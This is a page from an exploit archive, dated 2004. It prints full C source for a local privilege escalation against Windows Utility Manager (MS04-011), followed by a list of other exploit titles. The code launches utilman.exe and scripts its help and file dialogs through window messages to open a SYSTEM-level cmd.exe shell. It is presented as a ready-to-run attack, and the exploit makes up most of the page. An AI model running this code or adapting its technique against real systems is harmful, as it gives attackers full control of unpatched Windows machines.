exploits , vulnerabilities , articles , Microsoft Windows Utility Manager Local Privilege Escalation Exploit (MS04-011)

2004-04-15

Microsoft Windows Utility Manager Local Privilege Escalation Exploit (MS04-011)

// By Cesar Cerrudo cesar appsecinc com
// Local elevation of priviliges exploit for Windows Utility Manager 
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h> 
#include <windows.h> 
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[]) 
{ 
 HWND lHandle, lHandle2;
 POINT point;

 char sText[]="%windir%\\system32\\cmd.ex?";

 // run utility manager
 system("utilman.exe /start");
 Sleep(500);

 // execute contextual help
 SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
 Sleep(500);

 // open file open dialog windown in Windows Help
 PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND,
0x44D, 0);
 Sleep(500);

 // find open file dialog window
 lHandle = FindWindow("#32770","Open");

 // get input box handle
 lHandle2 = GetDlgItem(lHandle, 0x47C);
 Sleep(500);

 // set text to filter listview to display only cmd.exe
 SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
 Sleep(800);

 // send return
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

 //get navigation bar handle
 lHandle2 = GetDlgItem(lHandle, 0x4A0);
 //send tab
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
 Sleep(500);
 lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView",
NULL);
 //get list view handle
 lHandle2 = GetDlgItem(lHandle2, 0x1);

 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c"
char
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m"
char
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d"
char
 Sleep(500);
 
 // popup context menu
 PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
 Sleep(1000);

 // get context menu handle
 point.x =10; point.y =30;
 lHandle2=WindowFromPoint(point);

 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
 SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

 SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

 return(0);
}
securitydot.net - 2004-04-15

Exploits - newest 10 RSS | More

2007-06-15 57332 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34251 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42481 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29365 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19795 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16730 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19437 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16619 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33641 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17255 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit